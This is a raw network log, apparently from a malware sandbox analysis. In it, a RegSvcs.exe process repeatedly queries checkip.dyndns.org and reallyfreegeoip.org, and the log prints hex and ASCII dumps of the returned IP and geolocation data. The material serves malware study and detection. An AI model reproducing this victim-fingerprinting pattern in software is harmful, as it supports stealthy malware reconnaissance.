                                              Date: Mon, 18 Nov 2024 17:21:36 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 23a38b20a525c180c641ea83726f73b0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.549767132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:37.063261986 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:37.943816900 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f21374e4daa455982e25f2139f077ac3
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.549778132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:38.794673920 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:39.673593998 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 88d5a46f107ac1062b88f8604e757d4e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.549790132.226.247.73807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 18, 2024 18:21:40.488154888 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 18, 2024 18:21:41.345062971 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b5d64ec7fd3bd4de4764d14cf63b899c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549712188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:21 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:21 UTC841INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:21 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 549
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smE9GRd6a6ikUT1dvCkg7mpIIFS4Oi3rctFuubJCrw33jJMcyIIyA1Xa2BnbIqRR13893fEWsUu6VHReG5EiERq0dP3M1LENDHp5NR5KLEjo01HWZF8tC8JmdsSEVuqLzIfuofOE"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a2ee3ade2c95-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=24452&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118334&cwnd=32&unsent_bytes=0&cid=0fc97e2810e276e2&ts=281&x=0"
                                              2024-11-18 17:21:21 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549713188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:22 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:23 UTC846INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:22 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 6520
                                              Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl1u5EsR9dfWMXJmB8ksQk4M49smrPI9DX73P38juLK3RgmfRamiSH1y2oB6zEviSdUJxQ1nJm3neyrk9Uff0xzjMjkjCgRN62A1jgrc8YA4QIppjtMj0bb%2Bb%2FffP8VCYA60dtTJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a2f63c00b0d9-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=144446&cwnd=32&unsent_bytes=0&cid=01233c463918e102&ts=185&x=0"
                                              2024-11-18 17:21:23 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549715188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:24 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:25 UTC851INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:25 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 51959
                                              Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzM9vUEoCeSXN4TBgk7f4OYEEc7MUvPRa9j%2FWICYKhfEGhGxOn73HR1LTDR50uJxsyig4gt7em1Mvw6s2ta32nR%2Fhr8WwEcekVf%2F5%2FuWy6Vsvti4KktMm25rCtOTX3TRB8eu72Ab"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a3033eaae775-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18985&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=151893&cwnd=32&unsent_bytes=0&cid=5bf2be857224cefa&ts=164&x=0"
                                              2024-11-18 17:21:25 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549717188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:26 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:26 UTC851INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:26 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 554
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWpCx49fgXIbpeuRCTCPs2ZDcFyhy5Z3z8%2Bt7xutytzzFGM%2BbRM3MD%2FvqSBJZI7yXRWt4lzkiVXLL%2BwrOf5DUfW7MIclCym73S9T61Rb9ep4r991AX4%2FbSK3vR4ODH6yC6AlmTdj"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a30e58f02322-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=23536&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=123323&cwnd=32&unsent_bytes=0&cid=8c394b019f872736&ts=185&x=0"
                                              2024-11-18 17:21:26 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549719188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:28 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:28 UTC845INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:28 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 556
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8XCn51o1R6puDtBhlambcR%2BSS7BN8OL7cwC8%2BJauKCxOUMCQma0XgMKLGLupisjZeUKDOZMON32VPRBoNfKRBCH8wJ8dsqqZANoljtCnKi7thNjuwo1nnzj6lpROxDiqYIuawUb1"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a3196b56231c-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=23506&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=123082&cwnd=32&unsent_bytes=0&cid=16ede01376c3628f&ts=225&x=0"
                                              2024-11-18 17:21:28 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549725188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:30 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-18 17:21:30 UTC853INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:30 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 558
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hTABSMM6slkGJDwvxoEtw%2BGAe%2FMibojiZtBH5cMijQk86gzRysdS0T4BYuiZriUXjlsEP8n8TCXXGD%2FPyegRE1hDm6ENsBUVLgfO9Gm9P7JJ6eU1wLVrB%2Bd%2FQwEToV%2FpmMaqvd5"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a3245ab02bc4-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=24895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=701&delivery_rate=117095&cwnd=32&unsent_bytes=0&cid=52890ea7b4146b9a&ts=249&x=0"
                                              2024-11-18 17:21:30 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549726188.114.96.34437364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:30 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:30 UTC847INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:30 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 558
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHnbiiZZXpSXmS54uqXgyIGukwMoEm4gd7SoOGp%2F8XlgxsTFDymYqur1sMZBlQEsnITK%2FUDNa8YWhBHjNRrzuVDs5VXRGo5lMXsjml9xW38Jw5URfnP%2FxQZ8r2edLPmkQe55Rv7j"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a324688722c8-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=23785&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118131&cwnd=32&unsent_bytes=0&cid=866f6794759e6e1a&ts=180&x=0"
                                              2024-11-18 17:21:30 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.549731188.114.96.34437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-18 17:21:31 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-18 17:21:31 UTC847INHTTP/1.1 200 OK
                                              Date: Mon, 18 Nov 2024 17:21:31 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 559
                                              Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W14Kp1o1tI0rzbEGAI5mQMtX5sBwdeZ3q8xAOt09TaPFuwDjONf7XWhLmwTAeEDMouI%2BjAJRAb7yWMD4IUfOFM7zO3D4tFQ%2FJPrtPeTlZTGWNh%2FQFhvrvjPNK6AmQ0jijDH3iUii"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e49a32b3bbd22e6-ORD
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=23599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=122628&cwnd=32&unsent_bytes=0&cid=64b4a7d3eba39952&ts=183&x=0"
